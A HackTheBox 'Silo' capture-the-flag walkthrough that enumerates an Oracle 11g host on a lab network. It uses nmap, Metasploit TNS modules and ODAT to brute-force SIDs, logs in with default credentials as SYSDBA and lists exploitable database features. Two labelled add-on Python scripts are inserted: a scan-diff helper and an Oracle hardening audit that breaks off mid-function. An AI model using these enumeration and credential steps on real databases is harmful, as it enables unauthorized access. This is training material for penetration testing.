Hackthebox Silo Walkthrough

Initial Enumeration
Port Scan
└─$ nmap -sT -p- -min-rate 10000 -Pn -oN alltcp.txt 10.10.10.82
Host discovery disabled (-Pn). All addresses will be marked 'up' and scan times will be slower.
Starting Nmap 7.91 ( https://nmap.org ) at 2022-02-23 19:46 EST
Nmap scan report for 10.10.10.82
Host is up (0.091s latency).
Not shown: 65261 filtered ports, 269 closed ports
PORT STATE SERVICE
80/tcp open http
135/tcp open msrpc
139/tcp open netbios-ssn
445/tcp open microsoft-ds
8080/tcp open http-proxy
Nmap done: 1 IP address (1 host up) scanned in 121.90 seconds
┌──(rocky㉿kali)-[~/hckbox/silo]
└─$ nmap -sT -p- -min-rate 10000 -Pn -oN alltcp.txt 10.10.10.82
Host discovery disabled (-Pn). All addresses will be marked 'up' and scan times will be slower.
Starting Nmap 7.91 ( https://nmap.org ) at 2022-02-23 19:48 EST
Nmap scan report for 10.10.10.82
Host is up (0.100s latency).
Not shown: 65268 filtered ports, 262 closed ports
PORT STATE SERVICE
80/tcp open http
135/tcp open msrpc
139/tcp open netbios-ssn
445/tcp open microsoft-ds
8080/tcp open http-proxy
Nmap done: 1 IP address (1 host up) scanned in 13.36 seconds
┌──(rocky㉿kali)-[~/hckbox/silo]
└─$ sudo nmap -sU -p- -min-rate 10000 -Pn -oN alludp.txt 10.10.10.82
[sudo] password for rocky:
Host discovery disabled (-Pn). All addresses will be marked 'up' and scan times will be slower.
Starting Nmap 7.91 ( https://nmap.org ) at 2022-02-23 19:49 EST
Warning: 10.10.10.82 giving up on port because retransmission cap hit (10).
Nmap scan report for 10.10.10.82
Host is up (0.16s latency).
All 65535 scanned ports on 10.10.10.82 are open|filtered (65460) or closed (75)
Nmap done: 1 IP address (1 host up) scanned in 75.11 seconds
┌──(rocky㉿kali)-[~/hckbox/silo]
└─$ sudo nmap -p 80,135,139,445,8080 -Pn -sC -sV -oN detailed.txt 10.10.10.82
Host discovery disabled (-Pn). All addresses will be marked 'up' and scan times will be slower.
Starting Nmap 7.91 ( https://nmap.org ) at 2022-02-23 19:53 EST
Nmap scan report for 10.10.10.82
Host is up (0.16s latency).
PORT STATE SERVICE VERSION
80/tcp open http Microsoft IIS httpd 8.5
| http-methods:
|_ Potentially risky methods: TRACE
|_http-server-header: Microsoft-IIS/8.5
|_http-title: IIS Windows Server
135/tcp open msrpc Microsoft Windows RPC
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
445/tcp open microsoft-ds Microsoft Windows Server 2008 R2 - 2012 microsoft-ds
8080/tcp open http Oracle XML DB Enterprise Edition httpd
| http-auth:
| HTTP/1.1 401 Unauthorized\x0D
|_ Basic realm=XDB
|_http-server-header: Oracle XML DB/Oracle Database
|_http-title: 400 Bad Request
Service Info: OSs: Windows, Windows Server 2008 R2 - 2012; CPE: cpe:/o:microsoft:windows
Host script results:
|_clock-skew: mean: 3s, deviation: 0s, median: 3s
| smb-security-mode:
| authentication_level: user
| challenge_response: supported
|_ message_signing: supported
| smb2-security-mode:
| 2.02:
|_ Message signing enabled but not required
| smb2-time:
| date: 2022-02-24T00:53:53
|_ start_date: 2022-02-24T00:28:20
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 15.89 seconds
Vulnerability Scan
$ sudo nmap -p 80,135,139,445,8080 -script VULN 10.10.10.82
Starting Nmap 7.91 ( https://nmap.org ) at 2022-02-23 19:54 EST
Nmap scan report for 10.10.10.82
Host is up (0.057s latency).
PORT STATE SERVICE
80/tcp open http
|_http-csrf: Couldn't find any CSRF vulnerabilities.
|_http-dombased-xss: Couldn't find any DOM based XSS.
|_http-stored-xss: Couldn't find any stored XSS vulnerabilities.
135/tcp open msrpc
139/tcp open netbios-ssn
445/tcp open microsoft-ds
8080/tcp open http-proxy
| http-enum:
|_ /i/: Potentially interesting folder
Host script results:
|_samba-vuln-cve-2012-1182: NT_STATUS_ACCESS_DENIED
|_smb-vuln-ms10-054: false
|_smb-vuln-ms10-061: No accounts left to try
Nmap done: 1 IP address (1 host up) scanned in 342.38 seconds
SMB enumeration
It seems we may not get any information from the SMB ports.
sudo nmap -p 135,139,445 -script smb-enum-shares.nse 10.10.10.82
Starting Nmap 7.91 ( https://nmap.org ) at 2022-02-23 20:02 EST
Nmap scan report for 10.10.10.82
Host is up (0.057s latency).
PORT STATE SERVICE
135/tcp open msrpc
139/tcp open netbios-ssn
445/tcp open microsoft-ds
Nmap done: 1 IP address (1 host up) scanned in 4.33 seconds
┌──(rocky㉿kali)-[~/hckbox/silo]
└─$ sudo nmap -p 135,139,445 -script smb-enum-users.nse 10.10.10.82
Starting Nmap 7.91 ( https://nmap.org ) at 2022-02-23 20:03 EST
Nmap scan report for 10.10.10.82
Host is up (0.053s latency).
PORT STATE SERVICE
135/tcp open msrpc
139/tcp open netbios-ssn
445/tcp open microsoft-ds
Nmap done: 1 IP address (1 host up) scanned in 2.89 seconds
┌──(rocky㉿kali)-[~/hckbox/silo]
└─$ smbmap -H 10.10.10.82 -R
[!] Authentication error on 10.10.10.82
HTTP enumeration
gobuster dir -u http://10.10.10.82 -w /usr/share/wordlists/dirb/common.txt
===============================================================
Gobuster v3.1.0
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url: http://10.10.10.82
[+] Method: GET
[+] Threads: 10
[+] Wordlist: /usr/share/wordlists/dirb/common.txt
[+] Negative Status codes: 404
[+] User Agent: gobuster/3.1.0
[+] Timeout: 10s
===============================================================
2022/02/23 20:11:39 Starting gobuster in directory enumeration mode
===============================================================
/aspnet_client (Status: 301) [Size: 156] [--> http://10.10.10.82/aspnet_client/]
From the HTTP enumeration earlier we found an interesting folder:
8080/tcp open http-proxy | http-enum: |_ /i/: Potentially interesting folder

I am trying one more port scan to confirm that I have not missed any. I can see more ports which I could not find in the initial scan.
sudo nmap -sS -T4 -sV -sC 10.10.10.82
[sudo] password for rocky:
Starting Nmap 7.91 ( https://nmap.org ) at 2022-02-24 06:14 EST
Nmap scan report for 10.10.10.82
Host is up (0.089s latency).
Not shown: 987 closed ports
PORT STATE SERVICE VERSION
80/tcp open http Microsoft IIS httpd 8.5
| http-methods:
|_ Potentially risky methods: TRACE
|_http-server-header: Microsoft-IIS/8.5
|_http-title: IIS Windows Server
135/tcp open msrpc Microsoft Windows RPC
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
445/tcp open microsoft-ds Microsoft Windows Server 2008 R2 - 2012 microsoft-ds
1521/tcp open oracle-tns Oracle TNS listener 11.2.0.2.0 (unauthorized)
8080/tcp open http Oracle XML DB Enterprise Edition httpd
| http-auth:
| HTTP/1.1 401 Unauthorized\x0D
|_ Basic realm=XDB
|_http-server-header: Oracle XML DB/Oracle Database
|_http-title: 401 Unauthorized
49152/tcp open msrpc Microsoft Windows RPC
49153/tcp open msrpc Microsoft Windows RPC
49154/tcp open msrpc Microsoft Windows RPC
49155/tcp open msrpc Microsoft Windows RPC
49159/tcp open oracle-tns Oracle TNS listener (requires service name)
49160/tcp open msrpc Microsoft Windows RPC
49161/tcp open msrpc Microsoft Windows RPC
Service Info: OSs: Windows, Windows Server 2008 R2 - 2012; CPE: cpe:/o:microsoft:windows
Host script results:
|_clock-skew: mean: 15s, deviation: 0s, median: 14s
| smb-security-mode:
| account_used: guest
| authentication_level: user
| challenge_response: supported
|_ message_signing: supported
| smb2-security-mode:
| 2.02:
|_ Message signing enabled but not required
| smb2-time:
| date: 2022-02-24T11:16:31
|_ start_date: 2022-02-24T00:28:20
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 130.34 seconds
Now you can see more services and information. I don't know how I missed this on the initial scan. Always try to use manual scans and some automated script scans like AutoRecon during the exam to make sure no ports are missed; otherwise most of the time will be gone exploiting the wrong services.
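An added check, not from the original post, that makes the lesson above mechanical: parse two nmap -oN reports, list the open ports that one scan found and the other did not, and build a slow re-probe of exactly that gap. The two reports are constructed and abridged from the scan output shown above.

```python
import re
from typing import Dict

# Constructed from the walkthrough's own output (abridged): the -min-rate 10000
# full-range scan first, then the later default-range -T4 scan.
FAST_SCAN = """\
Nmap scan report for 10.10.10.82
Host is up (0.100s latency).
Not shown: 65268 filtered ports, 262 closed ports
PORT STATE SERVICE
80/tcp open http
135/tcp open msrpc
139/tcp open netbios-ssn
445/tcp open microsoft-ds
8080/tcp open http-proxy
"""

SLOW_SCAN = """\
Nmap scan report for 10.10.10.82
Host is up (0.089s latency).
Not shown: 987 closed ports
PORT STATE SERVICE VERSION
80/tcp open http Microsoft IIS httpd 8.5
135/tcp open msrpc Microsoft Windows RPC
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
445/tcp open microsoft-ds Microsoft Windows Server 2008 R2 - 2012 microsoft-ds
1521/tcp open oracle-tns Oracle TNS listener 11.2.0.2.0 (unauthorized)
8080/tcp open http Oracle XML DB Enterprise Edition httpd
49152/tcp open msrpc Microsoft Windows RPC
49159/tcp open oracle-tns Oracle TNS listener (requires service name)
"""

PORT_RE = re.compile(r"^(\d+)/(tcp|udp)\s+(\S+)\s+(\S+)")
NOT_SHOWN_RE = re.compile(r"^Not shown: (.*)$")
TARGET_RE = re.compile(r"^Nmap scan report for (\S+)")


def parse_report(text: str) -> Dict[str, object]:
    """Pull the target, the open ports and the 'Not shown' counts out of -oN text."""
    target = None
    open_ports: Dict[int, str] = {}
    not_shown: Dict[str, int] = {}
    for line in text.splitlines():
        m = TARGET_RE.match(line)
        if m:
            target = m.group(1)
            continue
        m = PORT_RE.match(line)
        if m and m.group(3) == "open":
            open_ports[int(m.group(1))] = m.group(4)
            continue
        m = NOT_SHOWN_RE.match(line)
        if m:
            # "65268 filtered ports, 262 closed ports" -> {"filtered": 65268, "closed": 262}
            for count, state in re.findall(r"(\d+) (\w+) ports?", m.group(1)):
                not_shown[state] = int(count)
    return {"target": target, "open": open_ports, "not_shown": not_shown}


def compare_scans(first: str, second: str) -> Dict[str, object]:
    """Diff the open-port sets of two reports and build a slow re-check for the gap.

    A port the second scan lists as open but the first did not was lumped into
    the first scan's 'Not shown' line (filtered, i.e. no reply, or closed).
    Over a VPN a -min-rate 10000 sweep drops replies, so 'filtered' there is
    not proof of a firewall; the returned command re-probes those ports at a
    rate the link can sustain.
    """
    a, b = parse_report(first), parse_report(second)
    only_in_first = sorted(set(a["open"]) - set(b["open"]))
    only_in_second = sorted(set(b["open"]) - set(a["open"]))
    rescan = ""
    if only_in_second:
        ports = ",".join(str(p) for p in only_in_second)
        rescan = f"nmap -sT -p {ports} --max-rate 100 -Pn {a['target']}"
    return {
        "only_in_first": only_in_first,
        "only_in_second": only_in_second,
        "first_filtered": a["not_shown"].get("filtered", 0),
        "rescan": rescan,
    }


if __name__ == "__main__":
    for key, value in compare_scans(FAST_SCAN, SLOW_SCAN).items():
        print(f"{key}: {value}")
```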
Oracle DB enumeration
Port 1521 runs Oracle TNS. The version number was also received in the nmap scan above. I could see some references in the msf console for DB enumeration:
msf6 > search TNS
Matching Modules
================
# Name Disclosure Date Rank Check Description
- ---- --------------- ---- ----- -----------
0 exploit/windows/oracle/tns_auth_sesskey 2009-10-20 great Yes Oracle 10gR2 TNS Listener AUTH_SESSKEY Buffer Overflow
1 exploit/windows/oracle/tns_arguments 2001-06-28 good Yes Oracle 8i TNS Listener (ARGUMENTS) Buffer Overflow
2 exploit/windows/oracle/tns_service_name 2002-05-27 good Yes Oracle 8i TNS Listener SERVICE_NAME Buffer Overflow
3 auxiliary/scanner/oracle/tnspoison_checker 2012-04-18 normal No Oracle TNS Listener Checker
4 auxiliary/admin/oracle/tnscmd 2009-02-01 normal No Oracle TNS Listener Command Issuer
5 auxiliary/admin/oracle/sid_brute 2009-01-07 normal No Oracle TNS Listener SID Brute Forcer
6 auxiliary/scanner/oracle/sid_brute normal No Oracle TNS Listener SID Bruteforce
7 auxiliary/scanner/oracle/sid_enum 2009-01-07 normal No Oracle TNS Listener SID Enumeration
8 auxiliary/scanner/oracle/tnslsnr_version 2009-01-07 normal No Oracle TNS Listener Service Version Query
Interact with a module by name or index. For example info 8, use 8 or use auxiliary/scanner/oracle/tnslsnr_version
msf6 > use auxiliary/scanner/oracle/sid_enum
msf6 auxiliary(scanner/oracle/sid_enum) > show option
[-] Invalid parameter "option", use "show -h" for more information
msf6 auxiliary(scanner/oracle/sid_enum) > show options
Module options (auxiliary/scanner/oracle/sid_enum):
Name Current Setting Required Description
---- --------------- -------- -----------
RHOSTS yes The target host(s), see https://github.com/rapid7/metasploit-framework/wiki/Using-Metasploit
RPORT 1521 yes The target port (TCP)
THREADS 1 yes The number of concurrent threads (max one per host)
msf6 auxiliary(scanner/oracle/sid_enum) > set RHOSTS 10.10.10.82
Tried some inbuilt tool in Kali and it gave some response, but no useful information:
tnscmd10g status -h 10.10.10.82
sending (CONNECT_DATA=(COMMAND=status)) to 10.10.10.82:1521
writing 89 bytes
reading
.a......"..U(DESCRIPTION=(ERR=12618)(VSNNUM=186647040)(ERROR_STACK=(ERROR=(CODE=12618)(EMFI=4))))
Up to some versions (12g) I read there is a TNS poisoning exploit which affects Oracle. Ours is 11g and there are some ways to check if the version is vulnerable. We can use the msf scan, which is allowed in OSCP.
msf6 > use auxiliary/scanner/oracle/tnspoison_checker
msf6 auxiliary(scanner/oracle/tnspoison_checker) > show options
Module options (auxiliary/scanner/oracle/tnspoison_checker):
Name Current Setting Required Description
---- --------------- -------- -----------
RHOSTS yes The target host(s), see https://github.com/rapid7/metasploit-framework/wiki/Using-Metasploit
RPORT 1521 yes The target port (TCP)
THREADS 1 yes The number of concurrent threads (max one per host)
msf6 auxiliary(scanner/oracle/tnspoison_checker) > set RHOSTS 10.10.10.82
RHOSTS => 10.10.10.82
msf6 auxiliary(scanner/oracle/tnspoison_checker) > show options
Module options (auxiliary/scanner/oracle/tnspoison_checker):
Name Current Setting Required Description
---- --------------- -------- -----------
RHOSTS 10.10.10.82 yes The target host(s), see https://github.com/rapid7/metasploit-framework/wiki/Using-Metasploit
RPORT 1521 yes The target port (TCP)
THREADS 1 yes The number of concurrent threads (max one per host)
msf6 auxiliary(scanner/oracle/tnspoison_checker) > run
[+] 10.10.10.82:1521 - 10.10.10.82:1521 is vulnerable
[*] 10.10.10.82:1521 - Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed
It says the destination is vulnerable. There is a tool, ODAT, which can be installed in Kali:
sudo apt install odat
[sudo] password for rocky:
Reading package lists... Done
Building dependency tree... Done
Reading state information... Done
The following package was automatically installed and is no longer required:
libiscsi7
Use 'sudo apt autoremove' to remove it.
The following additional packages will be installed:
libodpic3 oracle-instantclient-devel python3-argcomplete python3-colorlog python3-cx-oracle
Suggested packages:
libodpic-doc python-cx-oracle-doc
The following NEW packages will be installed:
libodpic3 odat oracle-instantclient-devel python3-argcomplete python3-colorlog python3-cx-oracle
0 upgraded, 6 newly installed, 0 to remove and 1657 not upgraded.
Need to get 1,026 kB of archives.
After this operation, 4,709 kB of additional disk space will be used.
Do you want to continue? [Y/n] Y
─(rocky㉿kali)-[~/tool/exp]
└─$ odat -h
usage: odat.py [-h] [--version]
{all,tnscmd,tnspoison,sidguesser,passwordguesser,utlhttp,httpuritype,utltcp,ctxsys,externaltable,dbmsxslprocessor,dbmsadvisor,utlfile,dbmsscheduler,java,passwordstealer,oradbg,dbmslob,stealremotepwds,userlikepwd,smb,privesc,cve,search,unwrapper,clean}
...
_ __ _ ___
/ \| \ / \|_ _|
( o ) o ) o || |
\_/|__/|_n_||_|
-------------------------------------------
_ __ _ ___
/ \ | \ / \ |_ _|
( o ) o ) o | | |
\_/racle |__/atabase |_n_|ttacking |_|ool
-------------------------------------------
By Quentin Hardy (quentin.hardy@protonmail.com or quentin.hardy@bt.com)
positional arguments:
{all,tnscmd,tnspoison,sidguesser,passwordguesser,utlhttp,httpuritype,utltcp,ctxsys,externaltable,dbmsxslprocessor,dbmsadvisor,utlfile,dbmsscheduler,java,passwordstealer,oradbg,dbmslob,stealremotepwds,userlikepwd,smb,privesc,cve,search,unwrapper,clean}
Download the Oracle client:
cd odat
┌──(rocky㉿kali)-[~/tool/exp/odat]
└─$ wget https://download.oracle.com/otn_software/linux/instantclient/19800/oracle-instantclient19.8-basiclite-19.8.0.0.0-1.x86_64.rpm
--2022-02-24 22:21:04-- https://download.oracle.com/otn_software/linux/instantclient/19800/oracle-instantclient19.8-basiclite-19.8.0.0.0-1.x86_64.rpm
Resolving download.oracle.com (download.oracle.com)... 49.44.204.29
Connecting to download.oracle.com (download.oracle.com)|49.44.204.29|:443... connected.
HTTP request sent, awaiting response... 200 OK
Length: 28068712 (27M) [application/x-redhat-package-manager]
Saving to: ‘oracle-instantclient19.8-basiclite-19.8.0.0.0-1.x86_64.rpm’
oracle-instantclient19.8-basiclite-19.8.0. 100%[========================================================================================>] 26.77M 1.58MB/s in 29s
2022-02-24 22:21:33 (950 KB/s) - ‘oracle-instantclient19.8-basiclite-19.8.0.0.0-1.x86_64.rpm’ saved [28068712/28068712]
┌──(rocky㉿kali)-[~/tool/exp/odat]
└─$ wget https://download.oracle.com/otn_software/linux/instantclient/19800/oracle-instantclient19.8-sqlplus-19.8.0.0.0-1.x86_64.rpm
--2022-02-24 22:21:39-- https://download.oracle.com/otn_software/linux/instantclient/19800/oracle-instantclient19.8-sqlplus-19.8.0.0.0-1.x86_64.rpm
Resolving download.oracle.com (download.oracle.com)... 49.44.204.29
Connecting to download.oracle.com (download.oracle.com)|49.44.204.29|:443... connected.
HTTP request sent, awaiting response... 200 OK
Length: 702872 (686K) [application/x-redhat-package-manager]
Saving to: ‘oracle-instantclient19.8-sqlplus-19.8.0.0.0-1.x86_64.rpm’
oracle-instantclient19.8-sqlplus-19.8.0.0. 100%[========================================================================================>] 686.40K 1.17MB/s in 0.6s
2022-02-24 22:21:40 (1.17 MB/s) - ‘oracle-instantclient19.8-sqlplus-19.8.0.0.0-1.x86_64.rpm’ saved [702872/702872]
┌──(rocky㉿kali)-[~/tool/exp/odat]
└─$ wget https://download.oracle.com/otn_software/linux/instantclient/19800/oracle-instantclient19.8-devel-19.8.0.0.0-1.x86_64.rpm
--2022-02-24 22:21:55-- https://download.oracle.com/otn_software/linux/instantclient/19800/oracle-instantclient19.8-devel-19.8.0.0.0-1.x86_64.rpm
Resolving download.oracle.com (download.oracle.com)... 49.44.204.29
Connecting to download.oracle.com (download.oracle.com)|49.44.204.29|:443... connected.
HTTP request sent, awaiting response... 200 OK
Length: 612416 (598K) [application/x-redhat-package-manager]
Saving to: ‘oracle-instantclient19.8-devel-19.8.0.0.0-1.x86_64.rpm’
oracle-instantclient19.8-devel-19.8.0.0.0- 100%[========================================================================================>] 598.06K 1.22MB/s in 0.5s
2022-02-24 22:21:56 (1.22 MB/s) - ‘oracle-instantclient19.8-devel-19.8.0.0.0-1.x86_64.rpm’ saved [612416/612416]
┌──(rocky㉿kali)-[~/tool/exp/odat]
└─$ sudo alien --to-deb *.rpm
[sudo] password for rocky:
sudo: alien: command not found
┌──(rocky㉿kali)-[~/tool/exp/odat]
└─$ sudo apt install alien
Reading package lists... Done
Building dependency tree... Done
┌──(rocky㉿kali)-[~/tool/exp/odat]
└─$ ls /usr/lib/oracle
19.6 19.8
┌──(rocky㉿kali)-[~/tool/exp/odat]
└─$ export ORACLE_HOME=/usr/lib/oracle/19.6/client64/
export LD_LIBRARY_PATH=$LD_LIBRARY_PATH:$ORACLE_HOME/lib
export PATH=${ORACLE_HOME}bin:$PATH
┌──(rocky㉿kali)-[~/tool/exp/odat]
└─$ pip install cx_Oracle
pip install pycryptodome==3.4.3
pip install passlib
pip install python-libnmap

Test the access:
└─$ sqlplus
SQL*Plus: Release 19.0.0.0.0 - Production on Fri Feb 25 05:09:52 2022
Version 19.8.0.0.0
Copyright (c) 1982, 2020, Oracle. All rights reserved.
Enter user-name
Find the database/username/password using ODAT:
$ ./odat.py sidguesser -s 10.10.10.82
05:05:16 ERROR -: Impossible to load local configuration files in conf/ and to set driver_name: module 'cx_Oracle' has no attribute 'init_oracle_client'
[1] (10.10.10.82:1521): Searching valid SIDs
[1.1] Searching valid SIDs thanks to a well known SID list on the 10.10.10.82:1521 server
[+] 'XE' is a valid SID. Continue... ################################################################################################################## | ETA: 00:00:02
100% |#####################################################################################################################################################| Time: 00:03:51
[1.2] Searching valid SIDs thanks to a brute-force attack on 1 chars now (10.10.10.82:1521)
100% |#####################################################################################################################################################| Time: 00:00:07
[1.3] Searching valid SIDs thanks to a brute-force attack on 2 chars now (10.10.10.82:1521)
[+] 'XE' is a valid SID. Continue... ################################################################################################### | ETA: 00:00:21
100% |#####################################################################################################################################################| Time: 00:03:21
[+] SIDs found on the 10.10.10.82:1521 server: XE
Using the msfconsole:
msf6 auxiliary(scanner/oracle/sid_enum) > use auxiliary/scanner/oracle/sid_brute
msf6 auxiliary(scanner/oracle/sid_brute) > show otions
[-] Invalid parameter "otions", use "show -h" for more information
msf6 auxiliary(scanner/oracle/sid_brute) > show options
Module options (auxiliary/scanner/oracle/sid_brute):
Name Current Setting Required Description
---- --------------- -------- -----------
BRUTEFORCE_SPEED 5 yes How fast to bruteforce, from 0 to 5
DB_ALL_CREDS false no Try each user/password couple stored in the current database
DB_ALL_PASS false no Add all passwords in the current database to the list
DB_ALL_USERS false no Add all users in the current database to the list
RHOSTS yes The target host(s), see https://github.com/rapid7/metasploit-framework/wiki/Using-Metaspl
oit
RPORT 1521 yes The target port (TCP)
SID no A specific SID to attempt.
SID_FILE /usr/share/metasploit-framework/data/wordlists/s no File containing instance names, one per line
id.txt
STOP_ON_SUCCESS false yes Stop guessing when a credential works for a host
THREADS 1 yes The number of concurrent threads (max one per host)
VERBOSE true yes Whether to print output for all attempts
msf6 auxiliary(scanner/oracle/sid_brute) > set RHOSTs 10.10.10.82
RHOSTs => 10.10.10.82
We found the username, password and database. Let's test the access:
sqlplus scott/tiger@10.10.10.82:1521/XE
SQL*Plus: Release 19.0.0.0.0 - Production on Fri Feb 25 05:19:04 2022
Version 19.8.0.0.0
Copyright (c) 1982, 2020, Oracle. All rights reserved.
ERROR:
ORA-28002: the password will expire within 7 days
Connected to:
Oracle Database 11g Express Edition Release 11.2.0.2.0 - 64bit Production
SQL> select * from user_role_privs;
USERNAME GRANTED_ROLE ADM DEF OS_
------------------------------ ------------------------------ --- --- ---
SCOTT CONNECT NO YES NO
SCOTT RESOURCE NO YES NO
SQL> exit
Disconnected from Oracle Database 11g Express Edition Release 11.2.0.2.0 - 64bit Production
The user's roles seem limited. There is a role in Oracle DB, SYSDBA, which is equivalent to sudo. Let's try connecting as user scott with this additional privilege using the command below:
sqlplus SCOTT/tiger@10.10.10.82:1521/XE as sysdba
SQL*Plus: Release 19.0.0.0.0 - Production on Fri Feb 25 05:26:09 2022
Version 19.8.0.0.0
Copyright (c) 1982, 2020, Oracle. All rights reserved.
Connected to:
Oracle Database 11g Express Edition Release 11.2.0.2.0 - 64bit Production
SQL> select * from user_role_privs;
USERNAME GRANTED_ROLE ADM DEF OS_
------------------------------ ------------------------------ --- --- ---
SYS ADM_PARALLEL_EXECUTE_TASK YES YES NO
SYS APEX_ADMINISTRATOR_ROLE YES YES NO
SYS AQ_ADMINISTRATOR_ROLE YES YES NO
SYS AQ_USER_ROLE YES YES NO
SYS AUTHENTICATEDUSER YES YES NO
SYS CONNECT YES YES NO
SYS CTXAPP YES YES NO
SYS DATAPUMP_EXP_FULL_DATABASE YES YES NO
SYS DATAPUMP_IMP_FULL_DATABASE YES YES NO
SYS DBA YES YES NO
SYS DBFS_ROLE YES YES NO
USERNAME GRANTED_ROLE ADM DEF OS_
------------------------------ ------------------------------ --- --- ---
SYS DELETE_CATALOG_ROLE YES YES NO
SYS EXECUTE_CATALOG_ROLE YES YES NO
SYS EXP_FULL_DATABASE YES YES NO
SYS GATHER_SYSTEM_STATISTICS YES YES NO
SYS HS_ADMIN_EXECUTE_ROLE YES YES NO
SYS HS_ADMIN_ROLE YES YES NO
SYS HS_ADMIN_SELECT_ROLE YES YES NO
SYS IMP_FULL_DATABASE YES YES NO
SYS LOGSTDBY_ADMINISTRATOR YES YES NO
SYS OEM_ADVISOR YES YES NO
SYS OEM_MONITOR YES YES NO
USERNAME GRANTED_ROLE ADM DEF OS_
------------------------------ ------------------------------ --- --- ---
SYS PLUSTRACE YES YES NO
SYS RECOVERY_CATALOG_OWNER YES YES NO
SYS RESOURCE YES YES NO
SYS SCHEDULER_ADMIN YES YES NO
SYS SELECT_CATALOG_ROLE YES YES NO
SYS XDBADMIN YES YES NO
SYS XDB_SET_INVOKER YES YES NO
SYS XDB_WEBSERVICES YES YES NO
SYS XDB_WEBSERVICES_OVER_HTTP YES YES NO
SYS XDB_WEBSERVICES_WITH_PUBLIC YES YES NO
32 rows selected.
To see the actual privileges which scott has:
$ sudo odat all -s 10.10.10.82 -d XE -U SCOTT -P tiger --sysdba
[sudo] password for rocky:
[1] (10.10.10.82:1521): Is it vulnerable to TNS poisoning (CVE-2012-1675)?
[+] The target is vulnerable to a remote TNS poisoning
[2] (10.10.10.82:1521): Testing all modules on the XE SID with the SCOTT/tiger account
[2.1] UTL_HTTP library ?
[+] OK
[2.2] HTTPURITYPE library ?
[+] OK
[2.3] UTL_FILE library ?
[+] OK
[2.4] JAVA library ?
[-] KO
[2.5] DBMSADVISOR library ?
[+] OK
[2.6] DBMSSCHEDULER library ?
[-] KO
[2.7] CTXSYS library ?
[+] OK
[2.8] Hashed Oracle passwords ?
[+] OK
[2.9] Hashed Oracle passwords from history?
[+] OK
[2.10] DBMS_XSLPROCESSOR library ?
[+] OK
[2.11] External table to read files ?
[+] OK
[2.12] External table to execute system commands ?
[+] OK
[2.13] Oradbg ?
[-] KO
[2.14] DBMS_LOB to read files ?
[+] OK
[2.15] SMB authentication capture ?
[+] Perhaps (try with --capture to be sure)
[2.16] Gain elevated access (privilege escalation)?
[2.16.1] DBA role using CREATE/EXECUTE ANY PROCEDURE privileges?
[+] OK
[2.16.2] Modification of users' passwords using CREATE ANY PROCEDURE privilege only?
[-] KO
[2.16.3] DBA role using CREATE ANY TRIGGER privilege?
[-] KO
[2.16.4] DBA role using ANALYZE ANY (and CREATE PROCEDURE) privileges?
[-] KO
[2.16.5] DBA role using CREATE ANY INDEX (and CREATE PROCEDURE) privileges?
[-] KO
[2.17] Modify any table while/when he can select it only normally (CVE-2014-4237)?
[+] Impossible to know
[2.18] Create file on target (CVE-2018-3004)?
[-] KO
[2.19] Obtain the session key and salt for arbitrary Oracle users (CVE-2012-3137)?
[-] KO
Refer to the checks marked “OK”.
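An added audit script, not part of the walkthrough or of ODAT, that checks an instance for the conditions the chain above relied on: a default account left open, a non-SYS account able to connect AS SYSDBA, PUBLIC EXECUTE on the SYS packages ODAT marked OK, and a directory object under the IIS webroot. The sample rows are constructed; the password-file entry for SCOTT and the directory name WEBROOT_DIR are assumptions, since the page shows the SYSDBA login working but not why.

```python
from typing import Dict, List, Sequence, Tuple

Row = Tuple[str, ...]
Finding = Tuple[str, str]  # (what was found, suggested fix)

# SYS packages ODAT reported "OK" above; EXECUTE for PUBLIC on these lets any
# account read or write server files, or make outbound connections.
RISKY_PACKAGES = {"UTL_FILE", "UTL_HTTP", "HTTPURITYPE", "DBMS_XSLPROCESSOR",
                  "DBMS_ADVISOR", "DBMS_LOB", "DBMS_SCHEDULER"}
# Demo/default accounts that ship with Oracle and have well-known passwords.
DEFAULT_ACCOUNTS = {"SCOTT", "HR", "OE", "SH", "PM", "IX", "BI", "OUTLN", "DIP"}

# Read-only dictionary queries; the auditing account needs SELECT on these
# views (DBA or SELECT_CATALOG_ROLE).
QUERIES = {
    "default_accounts": "SELECT username, account_status FROM dba_users",
    "pwfile_users": "SELECT username, sysdba, sysoper FROM v$pwfile_users",
    "public_execute": ("SELECT grantee, table_name FROM dba_tab_privs "
                       "WHERE owner = 'SYS' AND privilege = 'EXECUTE' "
                       "AND grantee = 'PUBLIC'"),
    "directories": "SELECT directory_name, directory_path FROM dba_directories",
}


def check_default_accounts(rows: Sequence[Row]) -> List[Finding]:
    return [(f"default account {user} is {status}",
             f"ALTER USER {user} ACCOUNT LOCK PASSWORD EXPIRE")
            for user, status in rows
            if user in DEFAULT_ACCOUNTS and status.startswith("OPEN")]


def check_pwfile(rows: Sequence[Row]) -> List[Finding]:
    # v$pwfile_users lists who may connect AS SYSDBA over the network;
    # on a hardened instance that is SYS alone.
    return [(f"{user} can connect AS SYSDBA (password-file entry)",
             f"REVOKE SYSDBA FROM {user}")
            for user, sysdba, _ in rows if sysdba == "TRUE" and user != "SYS"]


def check_public_execute(rows: Sequence[Row]) -> List[Finding]:
    return [(f"PUBLIC has EXECUTE on SYS.{pkg}",
             f"REVOKE EXECUTE ON SYS.{pkg} FROM PUBLIC  -- test first, APEX uses some")
            for _, pkg in rows if pkg in RISKY_PACKAGES]


def check_directories(rows: Sequence[Row]) -> List[Finding]:
    # A directory object under the IIS webroot is what turns a file write
    # (the --putFile step used later in this walkthrough) into a web shell.
    return [(f"directory {name} maps to web-served path {path}",
             f"DROP DIRECTORY {name}")
            for name, path in rows
            if "inetpub" in path.lower() or "wwwroot" in path.lower()]


CHECKS = {
    "default_accounts": check_default_accounts,
    "pwfile_users": check_pwfile,
    "public_execute": check_public_execute,
    "directories": check_directories,
}


def evaluate(results: Dict[str, Sequence[Row]]) -> List[Finding]:
    """Turn query result rows (keyed like QUERIES) into findings."""
    findings: List[Finding] = []
    for name, check in CHECKS.items():
        findings.extend(check(results.get(name, [])))
    return findings


def run_audit(dsn: str, user: str, password: str, sysdba: bool = False) -> List[Finding]:
    """Run QUERIES over a live connection (cx_Oracle, installed earlier on this page)."""
    import cx_Oracle  # imported here so evaluate() works without the driver
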